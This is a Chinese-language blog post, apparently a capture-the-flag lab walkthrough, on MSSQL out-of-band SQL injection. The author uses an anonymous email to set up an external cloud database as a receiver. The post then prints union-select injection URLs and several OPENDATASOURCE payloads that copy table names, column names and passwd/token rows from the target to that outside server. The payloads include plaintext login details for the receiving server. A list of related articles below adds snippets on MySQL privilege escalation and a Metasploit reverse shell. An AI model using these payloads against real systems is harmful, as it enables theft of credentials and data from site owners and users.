mysql反弹注入平台_MSSQL-反弹注入

最新推荐文章于 2022-08-15 11:57:02 发布
最新推荐文章于 2022-08-15 11:57:02 发布
阅读量152 收藏
点赞数
文章标签: mysql反弹注入平台
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_27964579/article/details/113990143
版权

工具:香港云免费云服务器:http://www.webweb.com

注册使用匿名邮箱:https://bccto.me/

香港云服务器搭建MSSQL数据库,并建表admin,字段数要大于等于我们想要获取的表。

5290222dde37c69f3286e3ba217f1a45.png

闭合;

94ae3371a2573debc87d59e112483487.png

通过order by查询到表中为三字段。后来通过问别人知道里面还有一字段类型是二进制大对象 不支持order by——-所以说是四个字段,建表时尽可能多建吧。

先按照视频上讲的对靶场数据库进行表名,字段名查询常规操作,便于理解,但是实际反弹注入中可能不会出现:

查表名:http://59.63.200.79:8015/?id=1%27%20union%20select%20id,name,null%20from%20sysobjects%20where%20xtype=%27U%27--+

c9916ba3e3710d97f3302c99b0791cd3.png

查表中内容:

bc6963d435917d051bc54a25a2f86083.png

查出了id、passwd、token。其中token可能就是flag.

接下来尝试反弹注入:

注册香港云:

账号:saddadsadadsa

香港运登录密码:12345678

数据库库名:DB_14B8A3E_AAAA

数据库密码:12345678

数据库链接地址:SQL5006.webweb.com

数据库用户名:DB_14B8A3E_AAAA_admin

在香港云的数据库中创建一个大于三字段的表,用来接收数据。

0374a4b2b0643fbded32ad9bc10e8ec0.png

我们创建了一个叫admin的四字段表用来接收反弹注入数据;

构建语句:insert

into

opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin

select * from admin —+

执行状况:

8710d718fce188b502622032ecccbe2f.png

获得flag.当然这里数据只有一条,实战中应该结合系统自代表一步步查询。

insert

into

opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin

select null,null,name,null from sysobjects where xtype=’U’ —+

查询出所有用户创建表:

4cac6875f56bf215c70355546aaad774.png

ca75a8753a0d51ba5dc1b1ce13406c30.png

获得表的id。

查询admin表中字段:insert

into

opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin

select * from syscolumns where id=1977058079 —+

ef4d2318038663b0fc3597cc152a2a2f.png

获得字段.

获得表中数据:insert

into

opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin

select%20 id,passwd,token,username from admin —+

5ac7c5668abfbbfab5b449cc99f78ddb.png

获得flag.

BR姬
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MSSQL-反弹注入
weixin_45634365的博客
03-04 335
一、MSSQL反弹注入的使用场景 MSSQL其实就是SQLServer。 MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,造就了新颖独特的攻击思路。 在注入攻击中常常遇到这些问题: (1)明明是SQL注入点却无法注入 (2)注入工具猜解的速度异常缓慢 (3)错误提示信息关闭 (4)无法返回注入结果 为了解决上述问题,比较好的方法是使用反弹注入技术。 反弹注入:将查询到的数据插入到其他数据库,可以复制大量的数据。 二、快速搭建一个MSSQL环境 MSSQ
mysql反弹提权_MySQL数据库反弹端口连接提权
weixin_42545292的博客
01-19 703
【51CTO.com原创稿件】在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令。在一般的情况下,也就放弃了。但其实可以换一种思路,通过mysql查询来直接提权,可以针对以下场景:(1)通过网站无法获取webshell(2)Webshell无法执行命令(3)有phpmyadmin和root账号,无法查询或者无法获取网...
mysql反弹注入平台_MSSQL注入--反弹注入
weixin_30284287的博客
02-11 199
明明是sql注入的点,却无法进行注入,注射工具拆解的速度异常的缓慢,错误提示信息关闭,无法返回注入的结果,这个时候你便可以尝试使用反弹注入反弹注入需要依赖于函数opendatasource的支持,将当前数据库中的查询结果发送到另一数据库服务器中。判断数据库类型and exists (select * from sysobjects)--返回正常为mssql(也名sql server)and ex...
mysql 反弹shell_mysql mof+metasploit反弹shell
weixin_35895056的博客
01-27 750
metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网useexploit/windows/mysql/mysql_mofsetpasswordxxx//设置登录mysql的密码setusernamexxx//设置登录mysql的用户setrhostxx...
mssql反弹注入
笔墨稠思
11-25 372
1.反弹注入原理 通过opendatasource()将查询到的数据发送到mssql服务器 2.反弹注入使用条件 是否存在堆叠注入 注意事项: 1.mssql 对字段的数据类型要求严格,测试回显点时,可以使用null来代替字段,之后对null进行替换,找出争取的数据类型 2.在使用联合查询时,推荐使用union all 进行查询 3.之前在mysql中查询表和字段时使用的系统自带库 information_schema在mssql中也存在,仍然可以使用,也可以使用其系统自带表,sysobjects查询表名,
最好的MSSQLMySQL数据库迁移工具_MSSQL-to-MySQL
10-29
MSSQL to MySQL 是一个功能强大的数据库转换程序,程序可以帮助你快速安全的将MySQL数据库转换为MS SQL数据库,可以直接连接导入,也可以生成脚本。
mysql-connector-java_8.0.27-1ubuntu20.04_all.deb
01-17
mysql8.0 jdbcq驱动
mysql-workbench-community_8.0.27-1ubuntu20.04_amd64.deb
11-20
使用于Ubuntu20.04版本及其他版本的MySQL workbench deb包
mssql-jdbc-10.2.0.jre8.jar jre11,jre17
03-18
java jdbc方式连接mysql的驱动,来自MS官网下载地址。 https://docs.microsoft.com/zh-cn/sql/connect/jdbc/download-microsoft-jdbc-driver-for-sql-server?view=sql-server-ver15
migration-from-MSSQL-to-MYSQL.rar_mssql_step by step
09-22
Step By Step(Lua表达式和语句) .关于.NET对存储过程的调用抽象封装.聚类分析理论之TwoSteps理论篇+实践篇 .什么是SAAS.用perl做数据库迁移,从MSSQLMYSQL
mysql_reverse_udf.zip
08-02
mysql反弹端口提权利用dll文件。
MSSQL反弹注入
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-17 488
MSSSQL注入——反弹注入 我们首先先回顾一下MSSQL普通的显错注入(毕竟MSSQL显错注入MYSQL不太一样) 我这里还是联合传为例子,首先猜字段,然后联合查询,记住要写union all,然后猜输出点,要使用NULL去填充,注释只有 – + select name from dbo.sysdatabases 查询系统库 sysobjects 查询系统表 (xtype=‘U’) syscolumns 字段 (id= ) 指定sysobjects库中表名对应id 先尝试显错注入 ‘ and o
MSSQL注入——反弹注入
m0_55854679的博客
02-18 893
文章目录MSSQLSQL server】反弹注入使用场景快速搭建MSSQL环境MSSQL数据库反弹注入语句分析OPENDATASOURCE函数练习第一种方法——联合查询注入第二种方法——反弹注入+堆叠注入 MSSQLSQL server】反弹注入使用场景 与mysql大同小异,注入思路相同,但用到的函数等不同。 反弹注入 => 注入的手法(偏门)oob => 把查询到的数据插入外部的数据库(公网ip),反弹注入实际就是把查询出来的数据发送到我们的MSSQL服务器上。 快速搭建MSSQL
MSSQL--反弹注入
qq_68233961的博客
08-15 218
MSSQL--反弹注入
mysql注入反弹_一个mysql注入引发的通宵
weixin_34219634的博客
01-19 198
本来没准备通宵的,在t00ls看了会文章,然后准备睡觉,就在准备睡觉的时候,无意中发现了以前看过的某站(我属于看干劲做事的那种,当时没干劲,没搞下,然后最近干劲十足,在一看发现遍地是漏洞。。。)然后,我的通宵之mysql注入艰难拿shell就此开始......发现SQL注入漏洞跑了下二级,然后打开一个个随手测试,因为当时准备睡觉了,所以也就没想过认真搞。。。加个admin,后台出来,输入admin...
封神台MSSQL注入 - 反弹注入
qq_40941912的博客
10-05 232
一、作业 MSSQL注入 - 反弹注入 (Rank: 5) 判断页面是否存在注入:’ and 1=2 – qwe.页面不正常 判断输出位个数:‘ order by 3 — qwe,3个输出位. 输出位输出: 错误原因:MSSQL对输出位数据很严格.应该: ‘ union select 5,null,null — qwe 正常,说明第一个输出字段为整数. ‘union select 5,’a’,’a’ — qwe 说明第2,3字段为字符串. 对MMSQL猜表名: MMSQL的自带数据
SQL注入(MSSQL反弹注入)---zkaq
weixin_38237216的博客
04-11 1498
1.概念 1.反弹注入:是一种把查询到的数据插入外部的数据库的方法 2.mysqlSql Server的区别(不同的函数、不同的系统自带库) mysql系统自带库:table_name,columns_name,information_schema等 mysql独有的语法limit MSSQL:sysconstraints,syssegments等 sysobjects:查询系统表 (xtype=‘U’),'U’代表用户自创的类型;'S’代表系统自带的类型 syscolumns 字段 (id= ) 指定
数据库注入学习笔记3---MSSQ注入(反弹注入)
qq_41759633的博客
08-07 534
引:MSSQL注射攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖的攻击思路,而反弹注入技术需要依靠opendatasource函数支持 opendatasource:‘使用opendatasource函数将当前数据库中查询的结果发送到另一数据库服务器中’ 攻击过程: 攻击前准备: 首先需要在攻击者主机的SQL server 2000...
Mysql数据库反弹端口连接提权_MYSQL提权总结
weixin_39692045的博客
01-20 293
最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit...
mysqldump -u$mysql_user -p$mysql_password -h$mysql_host -P$mysql_port --all-databases | gzip > $backup_path/$backup_file
最新发布
05-11
这是一个备份 MySQL 数据库的命令,具体参数含义如下: - `-u`:指定数据库用户 - `-p`:指定数据库用户密码 - `-h`:指定 MySQL 服务器主机地址 - `-P`:指定 MySQL 服务器端口号 - `--all-databases`:备份所有...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值